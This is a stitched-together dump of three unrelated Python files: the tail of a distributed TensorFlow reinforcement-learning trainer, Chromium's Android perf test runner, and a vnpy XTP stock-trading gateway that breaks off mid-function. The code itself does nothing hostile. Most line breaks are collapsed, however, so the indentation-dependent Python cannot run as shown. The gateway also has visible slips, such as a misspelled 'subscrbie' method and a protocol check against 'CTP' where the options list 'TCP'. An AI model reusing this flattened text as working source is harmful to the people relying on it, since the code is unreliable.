% index) while len(sess.run(tf.report_uninitialized_variables())): print("Worker %d: waiting for variable initialization..." % index) time.sleep(1) print("Worker %d: variables initialized" % index) game_num = np.ceil(update_game_num // THREAD_NUM) UPDATE_EVENT.clear() ROLLING_EVENT.set() difficulty = INITIAL_DIFF # Run threads threads = [] for i in range(THREAD_NUM - 1): t = threading.Thread(target=run_thread, args=(agents[i], game_num, Synchronizer, difficulty)) threads.append(t) t.daemon = True t.start() time.sleep(3) run_thread(agents[-1], game_num, Synchronizer, difficulty) for t in threads: t.join() def Parameter_Server(Synchronizer, cluster, log_path, model_path, procs): print("Parameter_Server !") config = tf.ConfigProto( allow_soft_placement=True, log_device_placement=False, ) config.gpu_options.allow_growth = True server = tf.train.Server(cluster, job_name="ps", task_index=0, config=config) #config.gpu_options.per_process_gpu_memory_fraction = 0.2 sess = tf.Session(target=server.target, config=config) summary_writer = tf.summary.FileWriter(log_path) mini_net = MiniNetwork(sess, index=0, summary_writer=summary_writer, rl_training=True, cluster=cluster, ppo_load_path=FLAGS.restore_model_path, ppo_save_path=model_path, freeze_head=FLAGS.freeze_head, use_bn=FLAGS.use_bn, use_sep_net=FLAGS.use_sep_net, restore_model=FLAGS.restore_model, restore_from=FLAGS.restore_from, restore_to=FLAGS.restore_to) agent = MiniAgent(agent_id=-1, global_buffer=Buffer(), net=mini_net, restore_model=FLAGS.restore_model) print("Parameter server: waiting for cluster connection...") sess.run(tf.report_uninitialized_variables()) print("Parameter server: cluster ready!") print("Parameter server: initializing variables...") agent.init_network() print("Parameter server: variables initialized") last_win_rate = 0. 
update_counter = 0 while update_counter < TRAIN_ITERS: agent.reset_old_network() # wait for update Synchronizer.wait() logging("Update Network!") # TODO count the time , compare cpu and gpu time.sleep(1) # update finish Synchronizer.wait() logging("Update Network finished!") steps, win_rate = agent.update_summary(update_counter) logging("Steps: %d, win rate: %f" % (steps, win_rate)) update_counter += 1 if win_rate >= last_win_rate: agent.save_model() last_win_rate = win_rate for p in procs: print('Process terminate') p.terminate() if __name__ == "__main__": # create distribute tf cluster start_port = PORT_NUM SERVER_DICT["ps"].append("localhost:%d" % start_port) for i in range(PARALLEL): SERVER_DICT["worker"].append("localhost:%d" % (start_port + 1 + i)) Cluster = tf.train.ClusterSpec(SERVER_DICT) now = datetime.now() model_path = "./model/" + now.strftime("%Y%m%d-%H%M%S") + "_mini/" if not os.path.exists(model_path): os.makedirs(model_path) LOG = "./logs/" + now.strftime("%Y%m%d-%H%M%S") + "_mini/" UPDATE_GAME_NUM = NUM_FOR_UPDATE per_update_num = np.ceil(UPDATE_GAME_NUM / PARALLEL) print("Hello !") Synchronizer = mp.Barrier(PARALLEL + 1) # Run parallel process procs = [] for index in range(PARALLEL): p = mp.Process(name="Worker_%d" % index, target=Worker, args=(index, per_update_num, Synchronizer, Cluster, model_path)) procs.append(p) p.daemon = True p.start() time.sleep(1) Parameter_Server(Synchronizer, Cluster, LOG, model_path, procs) for p in procs: print('Process join') p.join()
test_runner.py
# Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.

"""Runs perf tests.

Our buildbot infrastructure requires each slave to run steps serially.
This is sub-optimal for android, where these steps can run independently on
multiple connected devices.

The buildbots will run this script multiple times per cycle:
- First: all steps listed in --steps will be executed in parallel using all
connected devices. Step results will be pickled to disk. Each step has a unique
name. The result code will be ignored if the step name is listed in
--flaky-steps.
The buildbot will treat this step as a regular step, and will not process any
graph data.

- Then, with --print-step STEP_NAME: at this stage, we'll simply print the file
with the step results previously saved. The buildbot will then process the graph
data accordingly.

The JSON steps file contains a dictionary in the format:
{ "version": int,
  "steps": {
    "foo": {
      "device_affinity": int,
      "cmd": "script_to_execute foo"
    },
    "bar": {
      "device_affinity": int,
      "cmd": "script_to_execute bar"
    }
  }
}

The JSON flaky steps file contains a list with step names whose results should
be ignored:
[
  "step_name_foo",
  "step_name_bar"
]

Note that script_to_execute must take at least the following
option:
  --device: the serial number to be passed to all adb commands.
""" import collections import datetime import json import logging import os import pickle import shutil import sys import tempfile import threading import time from pylib import cmd_helper from pylib import constants from pylib import forwarder from pylib.base import base_test_result from pylib.base import base_test_runner from pylib.device import battery_utils from pylib.device import device_errors def GetPersistedResult(test_name): file_name = os.path.join(constants.PERF_OUTPUT_DIR, test_name) if not os.path.exists(file_name): logging.error('File not found %s', file_name) return None with file(file_name, 'r') as f: return pickle.loads(f.read()) def OutputJsonList(json_input, json_output): with file(json_input, 'r') as i: all_steps = json.load(i) step_values = [] for k, v in all_steps['steps'].iteritems(): data = {'test': k, 'device_affinity': v['device_affinity']} persisted_result = GetPersistedResult(k) if persisted_result: data['total_time'] = persisted_result['total_time'] step_values.append(data) with file(json_output, 'w') as o: o.write(json.dumps(step_values)) return 0 def PrintTestOutput(test_name, json_file_name=None): """Helper method to print the output of previously executed test_name. Args: test_name: name of the test that has been previously executed. json_file_name: name of the file to output chartjson data to. Returns: exit code generated by the test step. 
""" persisted_result = GetPersistedResult(test_name) if not persisted_result: return 1 logging.info('*' * 80) logging.info('Output from:') logging.info(persisted_result['cmd']) logging.info('*' * 80) print persisted_result['output'] if json_file_name: with file(json_file_name, 'w') as f: f.write(persisted_result['chartjson']) return persisted_result['exit_code'] def PrintSummary(test_names): logging.info('*' * 80) logging.info('Sharding summary') device_total_time = collections.defaultdict(int) for test_name in test_names: file_name = os.path.join(constants.PERF_OUTPUT_DIR, test_name) if not os.path.exists(file_name): logging.info('%s : No status file found', test_name) continue with file(file_name, 'r') as f: result = pickle.loads(f.read()) logging.info('%s : exit_code=%d in %d secs at %s', result['name'], result['exit_code'], result['total_time'], result['device']) device_total_time[result['device']] += result['total_time'] for device, device_time in device_total_time.iteritems(): logging.info('Total for device %s : %d secs', device, device_time) logging.info('Total steps time: %d secs', sum(device_total_time.values())) class _HeartBeatLogger(object): # How often to print the heartbeat on flush(). 
_PRINT_INTERVAL = 30.0 def __init__(self): """A file-like class for keeping the buildbot alive.""" self._len = 0 self._tick = time.time() self._stopped = threading.Event() self._timer = threading.Thread(target=self._runner) self._timer.start() def _runner(self): while not self._stopped.is_set(): self.flush() self._stopped.wait(_HeartBeatLogger._PRINT_INTERVAL) def write(self, data): self._len += len(data) def flush(self): now = time.time() if now - self._tick >= _HeartBeatLogger._PRINT_INTERVAL: self._tick = now print '--single-step output length %d' % self._len sys.stdout.flush() def stop(self): self._stopped.set() class TestRunner(base_test_runner.BaseTestRunner): def __init__(self, test_options, device, shard_index, max_shard, tests, flaky_tests): """A TestRunner instance runs a perf test on a single device. Args: test_options: A PerfOptions object. device: Device to run the tests. shard_index: the index of this device. max_shards: the maximum shard index. tests: a dict mapping test_name to command. flaky_tests: a list of flaky test_name. 
""" super(TestRunner, self).__init__(device, None) self._options = test_options self._shard_index = shard_index self._max_shard = max_shard self._tests = tests self._flaky_tests = flaky_tests self._output_dir = None self._device_battery = battery_utils.BatteryUtils(self.device) @staticmethod def _IsBetter(result): if result['actual_exit_code'] == 0: return True pickled = os.path.join(constants.PERF_OUTPUT_DIR, result['name']) if not os.path.exists(pickled): return True with file(pickled, 'r') as f: previous = pickle.loads(f.read()) return result['actual_exit_code'] < previous['actual_exit_code'] @staticmethod def _SaveResult(result): if TestRunner._IsBetter(result): with file(os.path.join(constants.PERF_OUTPUT_DIR, result['name']), 'w') as f: f.write(pickle.dumps(result)) def _CheckDeviceAffinity(self, test_name): """Returns True if test_name has affinity for this shard.""" affinity = (self._tests['steps'][test_name]['device_affinity'] % self._max_shard) if self._shard_index == affinity: return True logging.info('Skipping %s on %s (affinity is %s, device is %s)', test_name, self.device_serial, affinity, self._shard_index) return False def _CleanupOutputDirectory(self): if self._output_dir: shutil.rmtree(self._output_dir, ignore_errors=True) self._output_dir = None def _ReadChartjsonOutput(self): if not self._output_dir: return '' json_output_path = os.path.join(self._output_dir, 'results-chart.json') try: with open(json_output_path) as f: return f.read() except IOError: logging.exception('Exception when reading chartjson.') logging.error('This usually means that telemetry did not run, so it could' ' not generate the file. Please check the device running' ' the test.') return '' def _LaunchPerfTest(self, test_name): """Runs a perf test. Args: test_name: the name of the test to be executed. 
Returns: A tuple containing (Output, base_test_result.ResultType) """ if not self._CheckDeviceAffinity(test_name): return '', base_test_result.ResultType.PASS try: logging.warning('Unmapping device ports') forwarder.Forwarder.UnmapAllDevicePorts(self.device) self.device.old_interface.RestartAdbdOnDevice() except Exception as e: logging.error('Exception when tearing down device %s', e) cmd = ('%s --device %s' % (self._tests['steps'][test_name]['cmd'], self.device_serial)) if self._options.collect_chartjson_data: self._output_dir = tempfile.mkdtemp() cmd = cmd + ' --output-dir=%s' % self._output_dir logging.info( 'temperature: %s (0.1 C)', str(self._device_battery.GetBatteryInfo().get('temperature'))) if self._options.max_battery_temp: self._device_battery.LetBatteryCoolToTemperature( self._options.max_battery_temp) logging.info('%s : %s', test_name, cmd) start_time = datetime.datetime.now() timeout = self._tests['steps'][test_name].get('timeout', 5400) if self._options.no_timeout: timeout = None logging.info('Timeout for %s test: %s', test_name, timeout) full_cmd = cmd if self._options.dry_run: full_cmd = 'echo %s' % cmd logfile = sys.stdout if self._options.single_step: # Just print a heart-beat so that the outer buildbot scripts won't timeout # without response. 
logfile = _HeartBeatLogger() cwd = os.path.abspath(constants.DIR_SOURCE_ROOT) if full_cmd.startswith('src/'): cwd = os.path.abspath(os.path.join(constants.DIR_SOURCE_ROOT, os.pardir)) try: exit_code, output = cmd_helper.GetCmdStatusAndOutputWithTimeout( full_cmd, timeout, cwd=cwd, shell=True, logfile=logfile) json_output = self._ReadChartjsonOutput() except cmd_helper.TimeoutError as e: exit_code = -1 output = str(e) json_output = '' finally: self._CleanupOutputDirectory() if self._options.single_step: logfile.stop() end_time = datetime.datetime.now() if exit_code is None: exit_code = -1 logging.info('%s : exit_code=%d in %d secs at %s', test_name, exit_code, (end_time - start_time).seconds, self.device_serial) if exit_code == 0: result_type = base_test_result.ResultType.PASS else: result_type = base_test_result.ResultType.FAIL # Since perf tests use device affinity, give the device a chance to # recover if it is offline after a failure. Otherwise, the master sharder # will remove it from the pool and future tests on this device will fail. try: self.device.WaitUntilFullyBooted(timeout=120) except device_errors.CommandTimeoutError as e: logging.error('Device failed to return after %s: %s' % (test_name, e)) actual_exit_code = exit_code if test_name in self._flaky_tests: # The exit_code is used at the second stage when printing the # test output. If the test is flaky, force to "0" to get that step green # whilst still gathering data to the perf dashboards. # The result_type is used by the test_dispatcher to retry the test. exit_code = 0 persisted_result = { 'name': test_name, 'output': output, 'chartjson': json_output, 'exit_code': exit_code, 'actual_exit_code': actual_exit_code, 'result_type': result_type, 'total_time': (end_time - start_time).seconds, 'device': self.device_serial, 'cmd': cmd, } self._SaveResult(persisted_result) return (output, result_type) def RunTest(self, test_name): """Run a perf test on the device. 
Args: test_name: String to use for logging the test result. Returns: A tuple of (TestRunResults, retry). """ _, result_type = self._LaunchPerfTest(test_name) results = base_test_result.TestRunResults() results.AddResult(base_test_result.BaseTestResult(test_name, result_type)) retry = None if not results.DidRunPass(): retry = test_name return results, retry
xtp_gateway.py
from typing import Any, Sequence from datetime import datetime from threading import Thread from vnpy.api.xtp.vnxtp import ( XTP, set_async_callback_exception_handler, AsyncDispatchException, OrderBookStruct, XTPMarketDataStruct, XTPQuoteStaticInfo, XTPRspInfoStruct, XTPSpecificTickerStruct, XTPTickByTickStruct, XTPTickerPriceInfo, XTPOrderInsertInfo, XTPOrderInfo, XTPTradeReport, XTPOrderCancelInfo, XTPCrdDebtInfo, XTPQueryStkPositionRsp, XTPQueryAssetRsp, XTPStructuredFundInfo, XTPFundTransferNotice, XTPQueryETFBaseRsp, XTPQueryETFComponentRsp, XTPQueryIPOTickerRsp, XTPQueryIPOQuotaRsp, XTPQueryOptionAuctionInfoRsp, XTP_EXCHANGE_TYPE, XTP_LOG_LEVEL, XTP_PROTOCOL_TYPE, XTP_TE_RESUME_TYPE, XTP_SIDE_BUY, XTP_SIDE_SELL, XTP_SIDE_MARGIN_TRADE, XTP_SIDE_SHORT_SELL, XTP_SIDE_REPAY_MARGIN, XTP_SIDE_REPAY_STOCK, XTP_ACCOUNT_TYPE, XTP_BUSINESS_TYPE, XTP_TICKER_TYPE, XTP_MARKET_TYPE, XTP_PRICE_TYPE, XTP_ORDER_STATUS_TYPE ) from vnpy.event import EventEngine from vnpy.trader.event import EVENT_TIMER from vnpy.trader.constant import Exchange, Product, Direction, OrderType, Status, Offset from vnpy.trader.gateway import BaseGateway from vnpy.trader.object import (CancelRequest, OrderRequest, SubscribeRequest, TickData, ContractData, OrderData, TradeData, PositionData, AccountData) from vnpy.trader.utility import get_folder_path API = XTP.API EXCHANGE_XTP2VT = { XTP_EXCHANGE_TYPE.XTP_EXCHANGE_SH: Exchange.SSE, XTP_EXCHANGE_TYPE.XTP_EXCHANGE_SZ: Exchange.SZSE, } EXCHANGE_VT2XTP = {v: k for k, v in EXCHANGE_XTP2VT.items()} MARKET_XTP2VT = { XTP_MARKET_TYPE.XTP_MKT_SH_A: Exchange.SSE, XTP_MARKET_TYPE.XTP_MKT_SZ_A: Exchange.SZSE } MARKET_VT2XTP = {v: k for k, v in MARKET_XTP2VT.items()} PRODUCT_XTP2VT = { XTP_TICKER_TYPE.XTP_TICKER_TYPE_STOCK: Product.EQUITY, XTP_TICKER_TYPE.XTP_TICKER_TYPE_INDEX: Product.INDEX, XTP_TICKER_TYPE.XTP_TICKER_TYPE_FUND: Product.FUND, XTP_TICKER_TYPE.XTP_TICKER_TYPE_BOND: Product.BOND, XTP_TICKER_TYPE.XTP_TICKER_TYPE_OPTION: Product.OPTION } # 
DIRECTION_VT2XTP = { # Direction.LONG: XTP_SIDE_BUY, # Direction.SHORT: XTP_SIDE_SELL # } DIRECTION_VT2XTP = { (Direction.LONG, Offset.OPEN): XTP_SIDE_MARGIN_TRADE, (Direction.SHORT, Offset.CLOSE): XTP_SIDE_REPAY_MARGIN, (Direction.SHORT, Offset.OPEN): XTP_SIDE_SHORT_SELL, (Direction.LONG, Offset.CLOSE): XTP_SIDE_REPAY_STOCK, (Direction.SHORT, Offset.NONE): XTP_SIDE_BUY, (Direction.LONG, Offset.NONE): XTP_SIDE_SELL, } DIRECTION_XTP2VT = {v: k for k, v in DIRECTION_VT2XTP.items()} ORDERTYPE_VT2XTP = { OrderType.LIMIT: XTP_PRICE_TYPE.XTP_PRICE_LIMIT, OrderType.MARKET: XTP_PRICE_TYPE.XTP_PRICE_BEST5_OR_CANCEL } ORDERTYPE_XTP2VT = {v: k for k, v in ORDERTYPE_VT2XTP.items()} STATUS_XTP2VT = { XTP_ORDER_STATUS_TYPE.XTP_ORDER_STATUS_INIT: Status.SUBMITTING, XTP_ORDER_STATUS_TYPE.XTP_ORDER_STATUS_ALLTRADED: Status.ALLTRADED, XTP_ORDER_STATUS_TYPE.XTP_ORDER_STATUS_PARTTRADEDQUEUEING: Status.PARTTRADED, XTP_ORDER_STATUS_TYPE.XTP_ORDER_STATUS_PARTTRADEDNOTQUEUEING: Status.CANCELLED, XTP_ORDER_STATUS_TYPE.XTP_ORDER_STATUS_NOTRADEQUEUEING: Status.NOTTRADED, XTP_ORDER_STATUS_TYPE.XTP_ORDER_STATUS_CANCELED: Status.CANCELLED, XTP_ORDER_STATUS_TYPE.XTP_ORDER_STATUS_REJECTED: Status.REJECTED, } symbol_name_map = {} symbol_exchange_map = {} class XtpGateway(BaseGateway): default_setting = { "账号": "", "密码": "", "客户号": 1, "行情地址": "", "行情端口": 0, "交易地址": "", "交易端口": 0, "行情协议": ["TCP", "UDP"], "授权码": "" } exchanges = list(EXCHANGE_VT2XTP.keys()) def __init__(self, event_engine: EventEngine): """""" super().__init__(event_engine, "XTP") self.quote_api = XtpQuoteApi(self) self.trader_api = XtpTraderApi(self) set_async_callback_exception_handler( self._async_callback_exception_handler) def connect(self, setting: dict): """""" userid = setting['账号'] password = setting['密码'] client_id = int(setting['客户号']) quote_ip = setting['行情地址'] quote_port = int(setting['行情端口']) trader_ip = setting['交易地址'] trader_port = int(setting['交易端口']) quote_protocol = setting["行情协议"] software_key = setting["授权码"] 
self.quote_api.connect(userid, password, client_id, quote_ip, quote_port, quote_protocol) self.trader_api.connect(userid, password, client_id, trader_ip, trader_port, software_key) self.init_query() def close(self): """""" self.quote_api.close() self.trader_api.close() def subscribe(self, req: SubscribeRequest): """""" self.quote_api.subscrbie(req) def send_order(self, req: OrderRequest) -> str: """""" return self.trader_api.send_order(req) def cancel_order(self, req: CancelRequest): """""" self.trader_api.cancel_order(req) def query_account(self): """""" self.trader_api.query_account() def query_position(self): """""" self.trader_api.query_position() def process_timer_event(self, event): """""" self.count += 1 if self.count < 2: return self.count = 0 func = self.query_functions.pop(0) func() self.query_functions.append(func) def init_query(self): """""" self.count = 0 self.query_functions = [self.query_account, self.query_position] self.event_engine.register(EVENT_TIMER, self.process_timer_event) def _async_callback_exception_handler(self, e: AsyncDispatchException): error_str = f"发生内部错误:\n" f"位置:{e.instance}.{e.function_name}" f"详细信息:{e.what}" print(error_str) class XtpQuoteApi(API.QuoteSpi): def __init__(self, gateway: BaseGateway): """""" super().__init__() self.gateway = gateway self.gateway_name = gateway.gateway_name self.userid = "" self.password = "" self.client_id: int = 0 self.server_ip = "" self.server_port: int = 0 self.server_protocol = "" self.api = None def connect( self, userid: str, password: str, client_id: int, server_ip: str, server_port: int, quote_protocol: str ): """""" if self.api: return self.userid = userid self.password = password self.client_id = client_id self.server_ip = server_ip self.server_port = server_port if quote_protocol == "CTP": self.quote_protocol = XTP_PROTOCOL_TYPE.XTP_PROTOCOL_TCP else: self.quote_protocol = XTP_PROTOCOL_TYPE.XTP_PROTOCOL_UDP # Create API object path = str(get_folder_path(self.gateway_name.lower())) 
self.api = API.QuoteApi.CreateQuoteApi( self.client_id, path, XTP_LOG_LEVEL.XTP_LOG_LEVEL_TRACE ) self.api.RegisterSpi(self) self.gateway.write_log("行情接口初始化成功") # Login to server Thread(target=self.login).start() def login(self): """""" ret = self.api.Login( self.server_ip, self.server_port, self.userid, self.password, self.quote_protocol ) if not ret: msg = "行情服务器登录成功" self.query_contract() else: msg = f"行情服务器登录失败,原因:{ret}" self.gateway.write_log(msg) def close(self): """""" if self.api: self.api.RegisterSpi(None) self.api.Release() def subscrbie(self, req: SubscribeRequest): """""" xtp_exchange = EXCHANGE_VT2XTP.get(req.exchange, "") self.api.SubscribeMarketData([req.symbol], xtp_exchange) def query_contract(self): """""" for exchange_id in EXCHANGE_XTP2VT.keys(): self.api.QueryAllTickers(exchange_id) def check_error(self, func_name: str, error_info: XTPRspInfoStruct): """""" if error_info and error_info.error_id: msg = f"{func_name}发生错误, 代码:{error_info.error_id},信息:{error_info.error_msg}" self.gateway.write_log(msg) return True else: return False def OnDisconnected(self, reason: int) -> Any: """""" self.gateway.write_log("行情服务器连接断开") self.login() def OnError(self, error_info: XTPRspInfoStruct) -> Any: """""" self.check_error("行情接口", error_info) def OnSubMarketData(self, ticker: XTPSpecificTickerStruct, error_info: XTPRspInfoStruct, is_last: bool) -> Any: """""" self.check_error("订阅行情", error_info) def OnUnSubMarketData(self, ticker: XTPSpecificTickerStruct, error_info: XTPRspInfoStruct, is_last: bool) -> Any: """""" pass def OnDepthMarketData(self, market_data: XTPMarketDataStruct, bid1_qty: Sequence[int], bid1_count: int, max_bid1_count: int, ask1_qty: Sequence[int], ask1_count: int, max_ask1_count: int) -> Any: """""" timestamp = str(market_data.data_time) dt = datetime.strptime(timestamp, "%Y%m%d%H%M%S%f") tick = TickData( symbol=market_data.ticker, exchange=EXCHANGE_XTP2VT[market_data.exchange_id], datetime=dt, volume=market_data.qty, 
last_price=market_data.last_price, limit_up=market_data.upper_limit_price, limit_down=market_data.lower_limit_price, open_price=market_data.open_price, high_price=market_data.high_price, low_price=market_data.low_price, pre_close=market_data.pre_close_price, bid_price_1=market_data.bid[0], bid_price_2=market_data.bid[1], bid_price_3=market_data.bid[2], bid_price_4=market_data.bid[3], bid_price_5=market_data.bid[4], ask_price_1=market_data.ask[0], ask_price_2=market_data.ask[1], ask_price_3=market_data.ask[2], ask_price_4=market_data.ask[3], ask_price_5=market_data.ask[4], bid_volume_1=market_data.bid_qty[0], bid_volume_2=market_data.bid_qty[1], bid_volume_3=market_data.bid_qty[2], bid_volume_4=market_data.bid_qty[3], bid_volume_5=market_data.bid_qty[4], ask_volume_1=market_data.ask_qty[0], ask_volume_2=market_data.ask_qty[1], ask_volume_3=market_data.ask_qty[2], ask_volume_4=market_data.ask_qty[3], ask_volume_5=market_data.ask_qty[4], gateway_name=self.gateway_name ) tick.name = symbol_name_map.get(tick.vt_symbol, tick.symbol) self.gateway.on_tick(tick) def OnSubOrderBook(self, ticker: XTPSpecificTickerStruct, error_info: XTPRspInfoStruct, is_last: bool) -> Any: """""" pass def OnUnSubOrderBook(self, ticker: XTPSpecificTickerStruct, error_info: XTPRspInfoStruct, is_last: bool) -> Any: """""" pass def OnOrderBook(self, order_book: OrderBookStruct) -> Any: """""" pass def OnSubTickByTick(self, ticker: XTPSpecificTickerStruct, error_info: XTPRspInfoStruct, is_last: bool) -> Any: """""" pass def OnUnSubTickByTick(self, ticker: XTPSpecificTickerStruct, error_info: XTPRspInfoStruct, is_last: bool) -> Any: """""" pass def OnTickByTick(self, tbt_data: XTPTickByTickStruct) -> Any: """""" pass def OnSubscribeAllMarketData(self, exchange_id: XTP_EXCHANGE_TYPE, error_info: XTPRspInfoStruct) -> Any: """""" pass def OnUnSubscribeAllMarketData(self, exchange_id: XTP_EXCHANGE_TYPE, error_info: XTPRspInfoStruct) -> Any: """""" pass def OnSubscribeAllOrderBook(self, exchange_id: 
XTP_EXCHANGE_TYPE, error_info: XTPRspInfoStruct) -> Any: """""" pass def OnUnSubscribeAllOrderBook(self, exchange_id: XTP_EXCHANGE_TYPE, error_info: XTPRspInfoStruct) -> Any: """""" pass def OnSubscribeAllTickByTick(self, exchange_id: XTP_EXCHANGE_TYPE, error_info: XTPRspInfoStruct) -> Any: """""" pass def OnUnSubscribeAllTickByTick(self, exchange_id: XTP_EXCHANGE_TYPE, error_info: XTPRspInfoStruct) -> Any: """""" pass def OnQueryAllTickers(self, ticker_info: XTPQuoteStaticInfo, error_info: XTPRspInfoStruct, is_last: bool) -> Any: """""" if self.check_error("查询合约", error_info): return contract = ContractData( symbol=ticker_info.ticker, exchange=EXCHANGE_XTP2VT[ticker_info.exchange_id], name=ticker_info.ticker_name, product=PRODUCT_XTP2VT[ticker_info.ticker_type], size=1, pricetick=ticker_info.price_tick, min_volume=ticker_info.buy_qty_unit, gateway_name=self.gateway_name ) self.gateway.on_contract(contract) symbol_name_map[contract.vt_symbol] = contract.name if contract.product != Product.INDEX: symbol_exchange_map[contract.symbol] = contract.exchange if is_last: self.gateway.write_log(f"{contract.exchange.value}合约信息查询成功") def OnQueryTickersPriceInfo(self, ticker_info: XTPTickerPriceInfo, error_info: XTPRspInfoStruct, is_last: bool) -> Any: """""" pass def OnSubscribeAllOptionMarketData(self, exchange_id: XTP_EXCHANGE_TYPE, error_info: XTPRspInfoStruct) -> Any: """""" pass def OnUnSubscribeAllOptionMarketData(self, exchange_id: XTP_EXCHANGE_TYPE, error_info: XTPRspInfoStruct) -> Any: """""" pass def OnSubscribeAllOptionOrderBook(self, exchange_id: XTP_EXCHANGE_TYPE, error_info: XTPRspInfoStruct) -> Any: """""" pass def OnUnSubscribeAllOptionOrderBook(self, exchange_id: XTP_EXCHANGE_TYPE, error_info: XTPRspInfoStruct) -> Any: """""" pass def OnSubscribeAllOptionTickByTick(self, exchange_id: XTP_EXCHANGE_TYPE, error_info: XTPRspInfoStruct) -> Any: """""" pass def OnUnSubscribeAllOptionTickByTick(self, exchange_id: XTP_EXCHANGE_TYPE, error_info: XTPRspInfoStruct) -> 
Any: """""" pass class XtpTraderApi(API.TraderSpi): def __init__(self, gateway: BaseGateway): """""" super().__init__() self.gateway = gateway self.gateway_name = gateway.gateway_name self.userid = "" self.password = "" self.client_id = "" self.server_ip = "" self.server_port = "" self.software_key = "" self.api = None self.session_id = 0 self.reqid = 0 # Whether current account supports margin or option self.margin_trading = False self.option_trading = False # self.short_positions = {} def connect( self, userid: str, password: str, client_id: int, server_ip: str, server_port: int, software_key: str ): """""" if self.api: return self.userid = userid self.password = password self.client_id = client_id self.server_ip = server_ip self.server_port = server_port self.software_key = software_key # Create API object path = str(get_folder_path(self.gateway_name.lower())) self.api = API.TraderApi.CreateTraderApi( self.client_id, path, XTP_LOG_LEVEL.XTP_LOG_LEVEL_TRACE ) self.api.RegisterSpi(self) self.api.SetSoftwareKey(self.software_key) self.api.SubscribePublicTopic(XTP_TE_RESUME_TYPE.XTP_TERT_RESTART) self.gateway.write_log("交易接口初始化成功") # Login to server Thread(target=self.login).start() def login(self): """""" self.session_id = self.api.Login( self.server_ip, self.server_port, self.userid, self.password, XTP_PROTOCOL_TYPE.XTP_PROTOCOL_TCP ) if self.session_id: msg = "交易服务器登录成功" else: error = self.api.GetApiLastError() msg = f"交易服务器登录失败,原因:{error.error_msg}" self.gateway.write_log(msg) def close(self): """""" if self.api: self.api.RegisterSpi(None) self.api.Release() def send_order(self, req: OrderRequest) -> str: """""" if req.exchange not in MARKET_VT2XTP: self.gateway.write_log(f"委托失败,不支持的交易所{req.exchange.value}") return "" if req.type not in ORDERTYPE_VT2XTP: self.gateway.write_log(f"委托失败,不支持的委托类型{req.type.value}") return "" xtp_req = XTPOrderInsertInfo() xtp_req.ticker = req.symbol xtp_req.market = MARKET_VT2XTP[req.exchange] xtp_req.price = req.price 
xtp_req.quantity = int(req.volume) xtp_req.side = DIRECTION_VT2XTP.get((req.direction, req.offset), "") xtp_req.price_type = ORDERTYPE_VT2XTP[req.type] if req.offset == Offset.NONE: xtp_req.business_type = XTP_BUSINESS_TYPE.XTP_BUSINESS_TYPE_CASH else: xtp_req.business_type = XTP_BUSINESS_TYPE.XTP_BUSINESS_TYPE_MARGIN orderid = self.api.InsertOrder(xtp_req, self.session_id) order = req.create_order_data(str(orderid), self.gateway_name) self.gateway.on_order(order) return order.vt_orderid def cancel_order(self, req: CancelRequest): """""" self.api.CancelOrder(int(req.orderid), self.session_id) def query_account(self): """""" if not self.api: return self.reqid += 1 self.api.QueryAsset(self.session_id, self.reqid) def query_position(self): """""" if not self.api: return self.reqid += 1 self.api.QueryPosition("", self.session_id, self.reqid) if self.margin_trading: self.reqid += 1 self.api.QueryCreditDebtInfo(self.session_id, self.reqid) def check_error(self, func_name: str, error_info: XTPRspInfoStruct): """""" if error_info and error_info.error_id: msg = f"{func_name}发生错误, 代码:{error_info.error_id},信息:{error_info.error_msg}" self.gateway.write_log(msg) return True else: return False def OnDisconnected(self, session_id: int, reason: int) -> Any: """""" self.gateway.write_log("交易服务器连接断开") self.login() def OnError(self, error_info: XTPRspInfoStruct) -> Any: """""" self.check_error("交易接口", error_info) def OnOrderEvent(self, order_info: XTPOrderInfo, error_info: XTPRspInfoStruct, session_id: int) -> Any: """""" self.check_error("委托下单", error_info) direction, offset = DIRECTION_XTP2VT[order_info.side] order = OrderData( symbol=order_info.ticker, exchange=MARKET_XTP2VT[order_info.market], orderid=str(order_info.order_xtp_id), type=ORDERTYPE_XTP2VT[order_info.price_type], direction=direction, offset=offset, price=order_info.price, volume=order_info.quantity, traded=order_info.qty_traded, status=STATUS_XTP2VT[order_info.order_status], time=order_info.insert_time, 
gateway_name=self.gateway_name ) self.gateway.on_order(order) def OnTradeEvent(self, trade_info: XTPTradeReport, session_id: int) -> Any: """""" direction, offset = DIRECTION_XTP2VT[trade_info.side] trade = TradeData( symbol=trade_info.ticker, exchange=MARKET_XTP2VT[trade_info.market], orderid=str(trade_info.order_xtp_id), tradeid=str(trade_info.exec_id), direction=direction, offset=offset, price=trade_info.price, volume=trade_info.quantity, time=trade_info.trade_time, gateway_name=self.gateway_name ) self.gateway.on_trade(trade) def OnCancelOrderError(self, cancel_info: XTPOrderCancelInfo, error_info: XTPRspInfoStruct, session_id: int) -> Any: """""" self.check_error("委托撤单", error_info) def OnQueryOrder(self, order_info: XTPOrderInfo, error_info: XTPRspInfoStruct, is_last: bool, session_id: int) -> Any: """""" if self.check_error("查询委托", error_info): return self.updateOrder(order_info) if is_last: self.gateway.write_log("查询委托信息成功") def OnQueryTrade(self, trade_info: XTPTradeReport, error_info: XTPRspInfoStruct, is_last: bool, session_id: int) -> Any: """""" if self.check_error("查询成交", error_info): return self.updateTrade(trade_info) if is_last: self.gateway.write_log("查询成交信息成功") def OnQueryPosition(self, xtp_position: XTPQueryStkPositionRsp, error_info: XTPRspInfoStruct, request_id: int, is_last: bool, session_id: int) -> Any: """""" position = PositionData( symbol=xtp_position.ticker, exchange=MARKET_XTP2VT[xtp_position.market], direction=Direction.LONG, volume=xtp_position.total_qty, frozen=xtp_position.locked_position, price=xtp_position.avg_price, pnl=xtp_position.unrealized_pnl, yd_volume=xtp_position.yesterday_position, gateway_name=self.gateway_name ) self.gateway.on_position(position) def OnQueryAsset(self, asset: XTPQueryAssetRsp, error_info: XTPRspInfoStruct, request_id: int, is_last: bool, session_id: int) -> Any: """""" account = AccountData( accountid=self.userid, balance=asset.buying_power, frozen=asset.withholding_amount, 
